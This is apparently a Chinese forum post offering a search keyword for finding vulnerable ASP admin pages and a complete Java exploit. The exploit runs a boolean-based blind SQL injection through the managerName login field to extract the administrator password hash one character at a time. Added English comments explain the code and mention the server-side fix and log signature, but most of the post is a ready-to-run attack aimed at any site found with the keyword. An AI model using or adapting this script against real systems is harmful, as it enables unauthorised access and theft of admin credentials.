刚回到家里翻出来的,不知道还通不通杀额。没啥技术含量...瞧瞧就好

KeyWord:

    system/adminlogin.asp

Java写的Exp(对 system/chklogin.asp 登录表单的 managerName 参数做布尔盲注,逐位猜解 F_PassWord 字段):

package kk;
import java.io.*;
import java.net.*;

/**
 * Proof-of-concept client for a boolean-based blind SQL injection in the
 * {@code managerName} field posted to an ASP admin login handler
 * ({@code system/chklogin.asp}).
 *
 * <p>Constructing an instance runs the whole probe. For each of 16 character
 * positions it POSTs one login attempt per candidate in {@code key}; the candidate
 * is placed in a {@code mid(F_PassWord,<position>,1)='<candidate>'} condition that
 * follows a quote in the user name. A response containing "口令" is treated as the
 * "condition was true" signal and the candidate is printed to stdout.
 *
 * <p>NOTE(review), defender view: the payload can only have an effect if the handler
 * concatenates the posted user name into its SQL text, so the fix on the server side
 * is a parameterized query. On the wire this shows up as a burst of up to
 * 16 x 36 POSTs to the login handler from one client, each with
 * {@code mid(F_PassWord,} inside {@code managerName}; no User-Agent is set here, so
 * the JDK default ({@code Java/<version>}) is what the server would log.
 */
public class PostResquest {
       
        // Candidate alphabet: the ten digits and the 26 lowercase letters (the last two
        // entries are "z","y" rather than "y","z", which only affects the try order).
        private String[] key={"1","2","3","4","5","6","7","8","9","0","a","b","c","d","e","f","g","h","i","j","k","l","m","n","o","p","q","r","s","t","u","v","w","x","z","y"};

        /**
         * Runs the probe against the hard-coded URL and prints each matched character.
         *
         * <p>Stops early, after printing "出错了", when no candidate matches at some
         * position. I/O and URL errors are caught and their stack traces printed.
         */
        public PostResquest() {
                // Placeholder host as published on the page; only the path is specific.
                String urlStr="http://www.xxxxx.com/system/chklogin.asp";
                // Form-body template. "Num" and "Str" are literal markers substituted below
                // with the 1-based position and the candidate character.
                String value = "managerName=asdads'or%20mid(F_PassWord,Num,1)='Str&tpassWord=123456&surl=&submit.x=0&submit.y=0";
                String tempValue;
                String tempValue2;
                OutputStreamWriter oswPost;
                BufferedReader brPost;
                try {
                        URL url=new URL(urlStr);
                        StringBuffer temp;
                        HttpURLConnection conn;
                        // 16 positions, 1-based to match mid().
                        // NOTE(review): the fixed length and the digit/lowercase alphabet
                        // suggest a 16-character hex digest in F_PassWord; the page does
                        // not say so, confirm against the target schema.
                        for(int k=1;k<=16;k++){
                                tempValue=value.replaceAll("Num",String.valueOf(k));
                                for(int i=0;i<key.length;i++){
                                        // A fresh connection per guess; setDoOutput(true) makes
                                        // HttpURLConnection send the request as a POST.
                                        conn= (HttpURLConnection)url.openConnection();
                                        conn.setDoOutput(true);
                                        tempValue2=tempValue.replaceAll("Str", key[i]);
                                        oswPost=new OutputStreamWriter(conn.getOutputStream());
                                        oswPost.write(tempValue2);
                                        oswPost.flush();
                                        oswPost.close();
                                        // The reader decodes with the platform default charset and
                                        // is never closed; conn is never disconnected either.
                                        brPost=new BufferedReader(new InputStreamReader(conn.getInputStream()));
                                        String line=null;
                                        temp=new StringBuffer();
                            while((line=brPost.readLine())!=null) 
                            { 
                                    // Re-encodes the already-decoded line with the platform default
                                    // charset and decodes those bytes as gb2312, so the match below
                                    // depends on the JVM's default charset.
                                    line=new String(line.getBytes(),"gb2312");
                                    temp.append(line+"\r\n");
                            }
                            // "口令" means "password".
                            // NOTE(review): presumably part of the handler's wrong-password
                            // message, i.e. the user-name condition matched a row but the
                            // dummy password did not; the page does not show the response.
                            if(temp.indexOf("口令")>-1){
                                    System.out.print(key[i]);
                                    break;
                            }
                            // Reached only when the last candidate failed as well: print
                            // "出错了" ("an error occurred") and abandon the remaining positions.
                            if(i==key.length-1){
                                    System.out.println("出错了");
                                    return;
                            }
                           
                                }
                        }
                } catch (MalformedURLException e) {
                        e.printStackTrace();
                } catch (IOException e) {
                        e.printStackTrace();
                }
        }
        /**
         * Entry point: instantiating the class performs the whole run.
         *
         * @param args ignored
         */
        public static void main(String[] args) {
                new PostResquest();
        }
}